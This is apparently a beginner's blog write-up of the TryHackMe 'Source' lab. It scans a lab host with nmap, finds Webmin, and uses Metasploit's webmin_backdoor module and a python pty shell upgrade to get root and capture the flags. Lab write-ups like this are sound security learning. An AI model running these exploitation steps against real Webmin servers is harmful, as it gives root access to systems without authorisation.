← Back Published on

TryHackMe CTF writeup 'Source'

We are tasked with two flags that we need to capture. To accomplish this we need to exploit a vulnerability. It involves a web-based Target and back door access using Metasploit and Kali Linux. Objectives of this capture the flag is to get user flag and root flag information. 

Firstly, I spent over half an hour targeting the photo that was displayed on the TryHackMe Capture the Flag room. Needless to say, this photo had no information and was not even part of the game. :)

After embarrassing myself, I started to gather information on the target itself using nmap. 

that is not a pre-configured port, so let's dive into it and see what it really is.
We can see it is running a HTTP service named webmin.

Webmin is a server control panel for many Linux systems. It can be used to configure operating systems and edit what is inside of them.

We have an IP address and we have a port number let's do a web search to see what pops up 

> 10.10.226.21:10000

Here you can see I use the nmap command followed by a command to put the nmap results to a file named nmapTHM.txt for documentation purposes or later use

> Nmap -sV -sC -Pn -oN nmapTHM.txt 10.10.226.21

Within the nmap results we can see we have open ports
port 22 and port 10000
For 22 being open is very common as it is SSH and lots of systems use this
But Port 10000 is interesting 

As you see, we have a login page. As someone who researches and is learning Network Administration tools I can see this being a large red flag for any network security.

We now have a Target. And every system has a vulnerability, whether it be found or not

This CTF allowed me to research a new tool. We can simply internet search for vulnerabilities On Any Given Target. I used attacker KB for the first time and was able to Simply type in the version of webmin and search its currently version to see if there is any possible vulnerabilities.

- Using attacker KB this is the information I found

I was able to access the information that was posted and it gave me great insight to the current vulnerability. It gave an outline of what the vulnerability was, how it can be manipulated to an attackers benefit, along with how it can be hardened for someone on the defensive side of the network.

This is why it is huge for cybersecurity personnel to also know how hackers perform. I was also able to access a GitHub page that displayed more information regarding this vulnerability.

With the information that we have gathered so far, it is clear to see we have a possible back door exploit with the version that we are attacking. We are going to use a tool called Metasploit to display and use this backdoor exploit to our advantage as an attacker. Metasploit is a prebuilt tool in Kali Linux and is simply accessible within the terminal by typing the following command

> msfconsole

Once it is fully loaded we can type in the following command to allow us to search for the webmin backdoor.
> search webmin_backdoor And we get a clear text display of the vulnerabilities that we can perform

We see one we can use! Exploit number 0. The next commands are as followed

> Use 0 

> show options

We specify that we want to use exploit zero and to show possible options that pertain to the attack. We will break it down clearly next 

We actually want to start the attack at this moment. We set it up now. The following commands are

> RHOSTS 10.10.226.21

> set LHOST YOUR IP

> set ssl true

> RUN

The RHOSTS is the target, the LHOST is our VPN's IP that we used and SSL is set to true. We sent it to true because SSL is a secure socket layer. It allows the data to be sent between two systems with a direct connection.

Computers think with yes or no's. True or false. By setting SSL to true we are telling the computer to make a secure connection with the target host.

After a few minutes I received several failed attempts. This is due to my previous command line inputs. I did not set my LHOST to my IP. You can see this with the several sessions that I previously ran in the picture below.

after fixing this issue, we see proper results and a successful connection!

And we have successfully hacked into the target.

A simple who am I command confirms how we are root

> whoami

An analogy term for root would be a king of a castle. Root makes all the decisions and has all of the Privileges. If you own root on a system, you own that system

At this point I was having problems with connecting to the terminal of this root user.

I imported a python command of Pty.spawn Within bin/bash. This allowed me to have emulation of the terminal to display any information I wanted to see. The following command is below

> python -c 'import pty; pty.spawn("/bin/bash")'

After this task was completed. I had full view of all the files within the system. The current task was to collect two flags. They are simply located within the files of this root user. It took no effort at all to locate those flags and complete the challenge.

Some key takeaways that I learned from this TryHackMe capture the flag was to always update your system. Whether it be manually if you're hosting a small server base. Or to have tools put in place to automatically scan for out-of-date servers and domains on your network. This is why we update!

This is why the apps on your phone update, and you get that annoying Windows notification saying that your computer will reboot automatically for an update. It is because the software that we are using is ever-changing. Always installing new security tools, and trying to keep one step ahead of any malicious code, content, viruses, worms, or users that could compromise the system. More on types of cyber threats to come soon! :)